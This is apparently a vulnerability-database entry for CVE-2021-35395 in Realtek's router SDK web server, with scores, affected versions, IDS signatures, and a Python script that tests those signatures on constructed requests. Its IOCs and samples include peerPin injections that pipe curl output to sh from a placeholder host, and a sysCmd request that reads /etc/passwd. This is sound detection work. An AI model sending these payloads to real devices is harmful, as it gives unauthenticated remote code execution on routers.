cbcvebase.
CVE-2021-35395
published 2021-08-16


Priority: P1 (96) · Severity: critical · CVSS 3.1 base score: 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2021-11-17
Exploited in the wild
EPSS: 98.10% (99.9th percentile)
Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exist: one based on Go-Ahead, named webs, and another based on Boa, named boa. Both are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues:

- stack buffer overflow in formRebootCheck due to unsafe copy of the submit-url parameter
- stack buffer overflow in formWsc due to unsafe copy of the submit-url parameter
- stack buffer overflow in formWlanMultipleAP due to unsafe copy of the submit-url parameter
- stack buffer overflow in formWlSiteSurvey due to unsafe copy of the ifname parameter
- stack buffer overflow in formStaticDHCP due to unsafe copy of the hostname parameter
- stack buffer overflow in formWsc due to unsafe copy of the peerPin parameter
- arbitrary command execution in formSysCmd via the sysCmd parameter
- arbitrary command injection in formWsc via the peerPin parameter

Exploitability of the identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK web server. Some vendors use it as-is, others add their own authentication implementation; some kept all the features of the server, some removed some of them, and some inserted their own set of features. However, given that the Realtek SDK implementation is full of insecure calls and that developers tend to re-use those examples in their custom code, any binary based on the Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.

Affected (1 range)

Vendor    Product                                    Version range    Fixed in
realtek   rtl819x_jungle_software_development_kit    2.0 – 3.4.14b

Detection & IOCs (extracted from sources)

url: /goform/formWsc
url: /formSysCmd
command: submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
snort rule (sid 2033839):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35395)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/formSysCmd"; fast_pattern; endswith; http.request_body; content:"sysCmd="; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35395; classtype:attempted-user; sid:2033839; rev:2; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35395, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_08_30, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort rule (sid 2033840):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Realtek SDK - Command Injection Inbound (CVE-2021-35395)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/formWsc"; fast_pattern; endswith; http.request_body; content:"peerPin="; content:"|3b|"; within:50; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35395; classtype:attempted-user; sid:2033840; rev:3; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35395, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes: |3b| (ASCII ';')
  • Detect POST requests to /goform/formWsc with 'peerPin=' in the body followed by a semicolon (|3b|) within 50 bytes; this indicates a command injection attempt via the peerPin parameter. The rule looks for a literal 0x3b byte, so a percent-encoded semicolon in the body is not matched unless your engine decodes the request body before content matching.
  • Detect POST requests whose URI ends with /formSysCmd and whose body contains 'sysCmd='; this indicates an arbitrary command execution attempt via the sysCmd parameter. Because the URI test is endswith, a longer path such as /goform/formSysCmd also satisfies it.
  • The exploit payload uses shell command injection via peerPin, e.g. appending ';curl http://<url> | sh;' after a valid-looking PIN value.
  • Both 'webs' (Go-Ahead based) and 'boa' (Boa-based) HTTP management interface binaries are affected; monitor for POST requests to the formWsc, formSysCmd, formRebootCheck, formWlanMultipleAP, formWlSiteSurvey, and formStaticDHCP endpoints.
  • Exploitation of the stock SDK handlers is unauthenticated and network-accessible (CVSS AV:N/AC:L/PR:N); treat any inbound POST to the affected form endpoints from untrusted sources as a high-priority alert. Vendors that bolted their own authentication onto the web server may require a session first, but the handlers themselves are unchanged.
  • The two rules above are Emerging Threats rules written in Suricata sticky-buffer syntax (http.method, http.uri, http.request_body); they will not load unchanged on Snort 2, which uses the older content-modifier keywords.
  • Custom vendor code built on the Realtek SDK may introduce additional vulnerabilities beyond the base Realtek ones, even if the original handlers were removed.
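To check what the two rules actually fire on, the detection logic of sid 2033839 and sid 2033840 is rendered below in plain Python and run over constructed HTTP requests. This is an added example written for this page; it is not code from the page, from Realtek, or from the Emerging Threats or Suricata projects. It assumes a minimal HTTP/1.x request layout, compares the rules' endswith test against the URI path with any query string removed, and uses the RFC 5737 documentation addresses 192.0.2.1 and 198.51.100.7 in the samples.

```python
"""Plain-Python rendering of the two Emerging Threats rules quoted above
(sid 2033839 for /formSysCmd, sid 2033840 for /goform/formWsc).

Added example, not code from this page, from Realtek, or from the ET/Suricata
projects. The sample requests are constructed for illustration; the hosts are
documentation addresses chosen here. URI normalization is not modelled: the
endswith test is applied to the path with the query string stripped."""

from dataclasses import dataclass

# --- constructed sample requests (not real captures) ------------------------
SAMPLES = {
    # formWsc with ';' eight bytes after peerPin= -> sid 2033840 should fire.
    "wsc_injection": (
        "POST /goform/formWsc HTTP/1.1\r\n"
        "Host: 192.0.2.1\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;"
        "curl http://198.51.100.7/x | sh;&setPIN=Start+PIN&configVxd=off"
        "&resetRptUnCfg=0&peerRptPin="
    ),
    # Same endpoint, plain 8-digit PIN, no ';' -> must not fire.
    "wsc_benign": (
        "POST /goform/formWsc HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
        "submit-url=%2Fwlwps.asp&peerPin=12345678&setPIN=Start+PIN"
    ),
    # ';' present but 79 bytes after the end of peerPin= -> within:50 fails.
    "wsc_far_semicolon": (
        "POST /goform/formWsc HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
        "peerPin=12345678&filler=" + "A" * 60 + "&x=;id"
    ),
    # Percent-encoded ';' -> no literal 0x3b byte, the rule stays silent.
    "wsc_encoded": (
        "POST /goform/formWsc HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
        "peerPin=12345678%3Bid&setPIN=Start+PIN"
    ),
    # Longer path still ends with /formSysCmd, body has sysCmd= -> sid 2033839.
    "syscmd": (
        "POST /goform/formSysCmd HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
        "sysCmd=cat+/etc/passwd&apply=Apply&submit-url=%2Fsyscmd.asp"
    ),
    # GET with the parameter in the query string: rule requires POST and a
    # request body, so it must not fire.
    "syscmd_get": "GET /formSysCmd?sysCmd=id HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
}


@dataclass
class HttpRequest:
    method: str
    path: str
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Minimal HTTP/1.x parser: request line, headers skipped, body after
    the blank line. The query string is dropped from the path (assumption:
    good enough to stand in for the normalized URI buffer here)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    return HttpRequest(method, target.split("?", 1)[0], body)


def matches_syscmd_rule(req: HttpRequest) -> bool:
    """sid 2033839: POST, URI endswith /formSysCmd, body contains sysCmd=."""
    return (req.method == "POST"
            and req.path.endswith("/formSysCmd")
            and "sysCmd=" in req.body)


def matches_wsc_rule(req: HttpRequest, window: int = 50) -> bool:
    """sid 2033840: POST, URI endswith /goform/formWsc, body contains peerPin=
    and a literal ';' (|3b|) within `window` bytes after the end of that
    match. Every occurrence of peerPin= is tried, as an IDS engine would."""
    if req.method != "POST" or not req.path.endswith("/goform/formWsc"):
        return False
    start = 0
    while True:
        idx = req.body.find("peerPin=", start)
        if idx < 0:
            return False
        end = idx + len("peerPin=")
        if ";" in req.body[end:end + window]:
            return True
        start = idx + 1


def classify(raw: str) -> list[str]:
    """Return the sids that would alert on one raw request."""
    req = parse_request(raw)
    hits = []
    if matches_syscmd_rule(req):
        hits.append("sid:2033839")
    if matches_wsc_rule(req):
        hits.append("sid:2033840")
    return hits


def run_all() -> dict[str, list[str]]:
    return {name: classify(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in run_all().items():
        print(f"{name:18s} {'ALERT ' + ', '.join(hits) if hits else 'no match'}")
```

The two negative formWsc cases are the ones worth keeping in mind when tuning: the within:50 window means a semicolon pushed far past the PIN field is missed, and a percent-encoded %3B never produces the 0x3b byte the rule is looking for. Whether either gap matters on a given device depends on how the handler decodes the form, which the rule cannot know; pairing the signature with a plain "POST to the affected form endpoints from an untrusted source" alert, as the bullets above suggest, covers both.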

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck             9.8     CRITICAL
cisa                  9.8     CRITICAL